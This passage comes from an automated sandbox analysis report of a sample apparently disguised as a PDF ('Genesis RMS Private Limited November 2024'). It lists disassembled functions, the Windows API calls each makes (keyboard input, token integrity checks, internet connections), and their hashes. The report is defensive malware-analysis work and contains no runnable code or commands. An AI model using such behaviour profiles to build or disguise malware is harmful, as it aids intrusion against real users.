                                                                                                                      • DeleteFileW.KERNEL32(00000002,?,00000000), ref: 007BBB54
                                                                                                                      • CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 007BBB80
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1672512620.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1672473105.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672803107.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672816894.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_750000_Genesis RMS Private Limited November 2024 pdf.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: CreateHardLink$DeleteErrorFileLast
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3321077145-0
                                                                                                                      • Opcode ID: 42e918252617c19cab73c7291bd9fc9d56f9d982a7436004f49c2dd40088ee07
                                                                                                                      • Instruction ID: ad5948a94a3a73e53fa130cd9e51329978f243a3a7f3251f6b9ce4230382f1cd
                                                                                                                      • Opcode Fuzzy Hash: 42e918252617c19cab73c7291bd9fc9d56f9d982a7436004f49c2dd40088ee07
                                                                                                                      • Instruction Fuzzy Hash: 0B412839600610DFCB10EF14C588A9DBBE5AF89310B09C489ED4A9B362CB78FD05CB91
                                                                                                                      Function 007D8AC0 Relevance: 6.1, APIs: 4, Instructions: 109COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 007D8B4D
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1672512620.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1672473105.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672803107.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672816894.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_750000_Genesis RMS Private Limited November 2024 pdf.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: InvalidateRect
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 634782764-0
                                                                                                                      • Opcode ID: 2c8f5088c9805dbd0ddfa745ee33ec0d171177e40001dd750c19229882dd49a6
                                                                                                                      • Instruction ID: c091149ad823ca6c17490ca709d449ce189c61efc4fb9cdca544ab95c24254b4
                                                                                                                      • Opcode Fuzzy Hash: 2c8f5088c9805dbd0ddfa745ee33ec0d171177e40001dd750c19229882dd49a6
                                                                                                                      • Instruction Fuzzy Hash: 6531B2F4600204BFEBA19B18CC45FA937B4FB05310F248A17FA52D63A1DE39A9509A52
                                                                                                                      Function 007DADF1 Relevance: 6.1, APIs: 4, Instructions: 106windowCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • ClientToScreen.USER32(?,?), ref: 007DAE1A
                                                                                                                      • GetWindowRect.USER32(?,?), ref: 007DAE90
                                                                                                                      • PtInRect.USER32(?,?,007DC304), ref: 007DAEA0
                                                                                                                      • MessageBeep.USER32(00000000), ref: 007DAF11
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1672512620.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1672473105.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672803107.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672816894.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_750000_Genesis RMS Private Limited November 2024 pdf.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Rect$BeepClientMessageScreenWindow
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1352109105-0
                                                                                                                      • Opcode ID: 1cd8342389a8fac8bf68d20d05f08d8b1ec4c77fee28d1b8f99d480a5b9ca388
                                                                                                                      • Instruction ID: c5ada62b64e827cd3d8e215b72421b92cbd67095ec2e18fd489bc9c63c29393c
                                                                                                                      • Opcode Fuzzy Hash: 1cd8342389a8fac8bf68d20d05f08d8b1ec4c77fee28d1b8f99d480a5b9ca388
                                                                                                                      • Instruction Fuzzy Hash: A5417B70600219EFCB11CF58C885BA9BBF5FF48350F1881BAE8559B351D734E942DB92
                                                                                                                      Function 007B0FE6 Relevance: 6.1, APIs: 4, Instructions: 105keyboardwindowCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • GetKeyboardState.USER32(?,00000000,?,00000001), ref: 007B1037
                                                                                                                      • SetKeyboardState.USER32(00000080,?,00000001), ref: 007B1053
                                                                                                                      • PostMessageW.USER32(00000000,00000102,00000001,00000001), ref: 007B10B9
                                                                                                                      • SendInput.USER32(00000001,00000000,0000001C,00000000,?,00000001), ref: 007B110B
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1672512620.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1672473105.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672803107.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672816894.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_750000_Genesis RMS Private Limited November 2024 pdf.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: KeyboardState$InputMessagePostSend
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 432972143-0
                                                                                                                      • Opcode ID: a8f9535e804290cbaac6f3c3d0f597245d99444dc1633f75412c2df5584f6b0b
                                                                                                                      • Instruction ID: 27588c8fe436c5a5cc1cab12e02c17662970513e9583cb4b98b56cc3f06cb76c
                                                                                                                      • Opcode Fuzzy Hash: a8f9535e804290cbaac6f3c3d0f597245d99444dc1633f75412c2df5584f6b0b
                                                                                                                      • Instruction Fuzzy Hash: 13314B30E4068CEEFB309B698C297FABBA9AB45310FC4422AF591521D1C37C89D09765
                                                                                                                      Function 007B1121 Relevance: 6.1, APIs: 4, Instructions: 101keyboardwindowCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • GetKeyboardState.USER32(?,75C0C0D0,?,00008000), ref: 007B1176
                                                                                                                      • SetKeyboardState.USER32(00000080,?,00008000), ref: 007B1192
                                                                                                                      • PostMessageW.USER32(00000000,00000101,00000000), ref: 007B11F1
                                                                                                                      • SendInput.USER32(00000001,?,0000001C,75C0C0D0,?,00008000), ref: 007B1243
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1672512620.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1672473105.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672803107.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672816894.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_750000_Genesis RMS Private Limited November 2024 pdf.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: KeyboardState$InputMessagePostSend
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 432972143-0
                                                                                                                      • Opcode ID: 0b23d4a61c9f3462b1e2b0b2a1ae2c9ac575ce7e2974371920cf263585499dbb
                                                                                                                      • Instruction ID: ab7c9586e0d9f5dfdb8bf9ad3dded3912ec02e734ac1dc627987d6841ef6ed3a
                                                                                                                      • Opcode Fuzzy Hash: 0b23d4a61c9f3462b1e2b0b2a1ae2c9ac575ce7e2974371920cf263585499dbb
                                                                                                                      • Instruction Fuzzy Hash: CB312830A4060C9AEF248A698C297FA7BBAAB49310FC4835BF691921D1C33C89559755
                                                                                                                      Function 00786415 Relevance: 6.1, APIs: 4, Instructions: 97COMMONLIBRARYCODE
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 0078644B
                                                                                                                      • __isleadbyte_l.LIBCMT ref: 00786479
                                                                                                                      • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 007864A7
                                                                                                                      • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 007864DD
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1672512620.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1672473105.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672803107.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672816894.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_750000_Genesis RMS Private Limited November 2024 pdf.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3058430110-0
                                                                                                                      • Opcode ID: a52e3aa6066e9a6cb5ee625caded7360d6177d510a3c7529d437ea154bd79aa3
                                                                                                                      • Instruction ID: bc3b1c78b8e754ae3c09c3eb4e4d12f84d53b904c4ac7bab0a960322084e28a3
                                                                                                                      • Opcode Fuzzy Hash: a52e3aa6066e9a6cb5ee625caded7360d6177d510a3c7529d437ea154bd79aa3
                                                                                                                      • Instruction Fuzzy Hash: D031E131640286FFDF21AF64CC45BAE7BB5FF40360F154029E85987191E739DA50DB90
                                                                                                                      Function 007D5175 Relevance: 6.1, APIs: 4, Instructions: 95COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • GetForegroundWindow.USER32 ref: 007D5189
                                                                                                                        • Part of subcall function 007B387D: GetWindowThreadProcessId.USER32(00000000,00000000), ref: 007B3897
                                                                                                                        • Part of subcall function 007B387D: GetCurrentThreadId.KERNEL32 ref: 007B389E
                                                                                                                        • Part of subcall function 007B387D: AttachThreadInput.USER32(00000000,?,007B52A7), ref: 007B38A5
                                                                                                                      • GetCaretPos.USER32(?), ref: 007D519A
                                                                                                                      • ClientToScreen.USER32(00000000,?), ref: 007D51D5
                                                                                                                      • GetForegroundWindow.USER32 ref: 007D51DB
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1672512620.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1672473105.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672803107.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672816894.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_750000_Genesis RMS Private Limited November 2024 pdf.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2759813231-0
                                                                                                                      • Opcode ID: 6ce921e347df28cbf920a00fbbd7a99d395e85cfd11377e01af659698aa51b2d
                                                                                                                      • Instruction ID: ee6577b409299a8a22ee52534657a93e01db0ba6f55a62cd00276538e15adc22
                                                                                                                      • Opcode Fuzzy Hash: 6ce921e347df28cbf920a00fbbd7a99d395e85cfd11377e01af659698aa51b2d
                                                                                                                      • Instruction Fuzzy Hash: 40310371D00108EFDB00EFA5C8459EFB7F9EF54300F10846AE916E7241DA799E45CBA1
                                                                                                                      Function 007DC788 Relevance: 6.1, APIs: 4, Instructions: 83windowCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 00752612: GetWindowLongW.USER32(?,000000EB), ref: 00752623
                                                                                                                      • GetCursorPos.USER32(?), ref: 007DC7C2
                                                                                                                      • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,0078BBFB,?,?,?,?,?), ref: 007DC7D7
                                                                                                                      • GetCursorPos.USER32(?), ref: 007DC824
                                                                                                                      • DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,0078BBFB,?,?,?), ref: 007DC85E
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1672512620.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1672473105.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672803107.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672816894.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_750000_Genesis RMS Private Limited November 2024 pdf.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Cursor$LongMenuPopupProcTrackWindow
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2864067406-0
                                                                                                                      • Opcode ID: 6932b289cc2efdc15d531688da6272236f4abade2383d6e30c901b16efb5b8cd
                                                                                                                      • Instruction ID: 3e15fb40baebcffc30920b6ca75b808c8575c0e2805524fc4966dcb3e39f3a22
                                                                                                                      • Opcode Fuzzy Hash: 6932b289cc2efdc15d531688da6272236f4abade2383d6e30c901b16efb5b8cd
                                                                                                                      • Instruction Fuzzy Hash: 1931A835600018EFCB16CF98D898EEA7BBAFF49310F04416AF9468B261D7395D61EF60
                                                                                                                      Function 00770BD0 Relevance: 6.1, APIs: 4, Instructions: 79COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • __setmode.LIBCMT ref: 00770BF2
                                                                                                                        • Part of subcall function 00755B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,007B7B20,?,?,00000000), ref: 00755B8C
                                                                                                                        • Part of subcall function 00755B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,007B7B20,?,?,00000000,?,?), ref: 00755BB0
                                                                                                                      • _fprintf.LIBCMT ref: 00770C29
                                                                                                                      • OutputDebugStringW.KERNEL32(?), ref: 007A6331
                                                                                                                        • Part of subcall function 00774CDA: _flsall.LIBCMT ref: 00774CF3
                                                                                                                      • __setmode.LIBCMT ref: 00770C5E
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1672512620.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1672473105.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672803107.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672816894.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_750000_Genesis RMS Private Limited November 2024 pdf.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ByteCharMultiWide__setmode$DebugOutputString_flsall_fprintf
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 521402451-0
                                                                                                                      • Opcode ID: 3f07b1ca3471a318cb9e9ca8cdb7eb52cb9e84d4a83776725daaba5a16dff701
                                                                                                                      • Instruction ID: 5e9efb24b8272fe94738c64dd1c0947a65318d33796acfb796978e9fe7651024
                                                                                                                      • Opcode Fuzzy Hash: 3f07b1ca3471a318cb9e9ca8cdb7eb52cb9e84d4a83776725daaba5a16dff701
                                                                                                                      • Instruction Fuzzy Hash: B7112432A04208EACF05B3B89C4B9FE7B6D9F45360F14815AF20857192DF6D2D9687E5
                                                                                                                      Function 007A8B9E Relevance: 6.1, APIs: 4, Instructions: 79memoryCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 007A8652: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 007A8669
                                                                                                                        • Part of subcall function 007A8652: GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 007A8673
                                                                                                                        • Part of subcall function 007A8652: GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 007A8682
                                                                                                                        • Part of subcall function 007A8652: HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 007A8689
                                                                                                                        • Part of subcall function 007A8652: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 007A869F
                                                                                                                      • LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 007A8BEB
                                                                                                                      • _memcmp.LIBCMT ref: 007A8C0E
                                                                                                                      • GetProcessHeap.KERNEL32(00000000,00000000), ref: 007A8C44
                                                                                                                      • HeapFree.KERNEL32(00000000), ref: 007A8C4B
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1672512620.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1672473105.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672803107.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672816894.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_750000_Genesis RMS Private Limited November 2024 pdf.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Heap$InformationProcessToken$AllocErrorFreeLastLookupPrivilegeValue_memcmp
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1592001646-0
                                                                                                                      • Opcode ID: 438b20641aaab932d97a4b679df1a9edb2c8e6c166588ae74b108a4f6dc51164
                                                                                                                      • Instruction ID: ff57969cfdde1334147c28c7e7c1c024bf31b285eebd5801d27a1bad98d5a1f6
                                                                                                                      • Opcode Fuzzy Hash: 438b20641aaab932d97a4b679df1a9edb2c8e6c166588ae74b108a4f6dc51164
                                                                                                                      • Instruction Fuzzy Hash: 26219F71D02208EFDB04DF94C944BEEB7B8EF81351F048199E455A7241DB39AE05CF61
                                                                                                                      Function 007C1A5B Relevance: 6.1, APIs: 4, Instructions: 78networkCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 007C1A97
                                                                                                                        • Part of subcall function 007C1B21: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 007C1B40
                                                                                                                        • Part of subcall function 007C1B21: InternetCloseHandle.WININET(00000000), ref: 007C1BDD
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1672512620.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1672473105.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672803107.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672816894.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_750000_Genesis RMS Private Limited November 2024 pdf.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Internet$CloseConnectHandleOpen
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1463438336-0
                                                                                                                      • Opcode ID: 5b2f448c5e6f2fce67a127b17e10655644abf39a0430c52b0af842e4bf44e176
                                                                                                                      • Instruction ID: a4c872dfc5be27c899c343778edb948085190a3a30d8e6bc605cbbd5fff12530
                                                                                                                      • Opcode Fuzzy Hash: 5b2f448c5e6f2fce67a127b17e10655644abf39a0430c52b0af842e4bf44e176
                                                                                                                      • Instruction Fuzzy Hash: 5321D171201600BFDB129F608C04FBBB7BDFF45710F54402EFA0696652EB39E8219BA4
                                                                                                                      Function 007AE1AF Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 68stringCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 007AF5AD: lstrlenW.KERNEL32(?,00000002,?,?,000000EF,?,007AE1C4,?,?,?,007AEFB7,00000000,000000EF,00000119,?,?), ref: 007AF5BC
                                                                                                                        • Part of subcall function 007AF5AD: lstrcpyW.KERNEL32(00000000,?,?,007AE1C4,?,?,?,007AEFB7,00000000,000000EF,00000119,?,?,00000000), ref: 007AF5E2
                                                                                                                        • Part of subcall function 007AF5AD: lstrcmpiW.KERNEL32(00000000,?,007AE1C4,?,?,?,007AEFB7,00000000,000000EF,00000119,?,?), ref: 007AF613
                                                                                                                      • lstrlenW.KERNEL32(?,00000002,?,?,?,?,007AEFB7,00000000,000000EF,00000119,?,?,00000000), ref: 007AE1DD
                                                                                                                      • lstrcpyW.KERNEL32(00000000,?,?,007AEFB7,00000000,000000EF,00000119,?,?,00000000), ref: 007AE203
                                                                                                                      • lstrcmpiW.KERNEL32(00000002,cdecl,?,007AEFB7,00000000,000000EF,00000119,?,?,00000000), ref: 007AE237
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1672512620.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1672473105.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672803107.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672816894.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_750000_Genesis RMS Private Limited November 2024 pdf.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: lstrcmpilstrcpylstrlen
                                                                                                                      • String ID: cdecl
                                                                                                                      • API String ID: 4031866154-3896280584
                                                                                                                      • Opcode ID: 38f8c599afb046f0d49aa8520676788884d2c687d01dc9628faf8e6409adc37a
                                                                                                                      • Instruction ID: 705ce3db3c5302019a291d345b97f976e94d59160f5e6f70b66827445f923e93
                                                                                                                      • Opcode Fuzzy Hash: 38f8c599afb046f0d49aa8520676788884d2c687d01dc9628faf8e6409adc37a
                                                                                                                      • Instruction Fuzzy Hash: 1F119636200345EFCB25AF64DC49E7A77B8FF86350B40812AF816C7290EB799951D7A4
                                                                                                                      Function 00785332 Relevance: 6.1, APIs: 4, Instructions: 67COMMONLIBRARYCODE
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • _free.LIBCMT ref: 00785351
                                                                                                                        • Part of subcall function 0077594C: __FF_MSGBANNER.LIBCMT ref: 00775963
                                                                                                                        • Part of subcall function 0077594C: __NMSG_WRITE.LIBCMT ref: 0077596A
                                                                                                                        • Part of subcall function 0077594C: RtlAllocateHeap.NTDLL(018F0000,00000000,00000001,00000000,?,?,?,00771013,?), ref: 0077598F
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1672512620.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1672473105.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672803107.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672816894.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_750000_Genesis RMS Private Limited November 2024 pdf.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: AllocateHeap_free
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 614378929-0
                                                                                                                      • Opcode ID: 926472666984626d7a06664ae4e4ff246389fcb003e8f4f831e3229250ba0347
                                                                                                                      • Instruction ID: 92ce8ca03c12e428b69644e367a60fa52d18e66ea345c30f2cf548f5755ae29d
                                                                                                                      • Opcode Fuzzy Hash: 926472666984626d7a06664ae4e4ff246389fcb003e8f4f831e3229250ba0347
                                                                                                                      • Instruction Fuzzy Hash: D7112332684E05EFCF313F70EC0C65E3B98AF143E8B20852AF9099A491DFBD89409790
                                                                                                                      Function 00754531 Relevance: 6.1, APIs: 4, Instructions: 66timewindowCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • _memset.LIBCMT ref: 00754560
                                                                                                                        • Part of subcall function 0075410D: _memset.LIBCMT ref: 0075418D
                                                                                                                        • Part of subcall function 0075410D: _wcscpy.LIBCMT ref: 007541E1
                                                                                                                        • Part of subcall function 0075410D: Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 007541F1
                                                                                                                      • KillTimer.USER32(?,00000001,?,?), ref: 007545B5
                                                                                                                      • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 007545C4
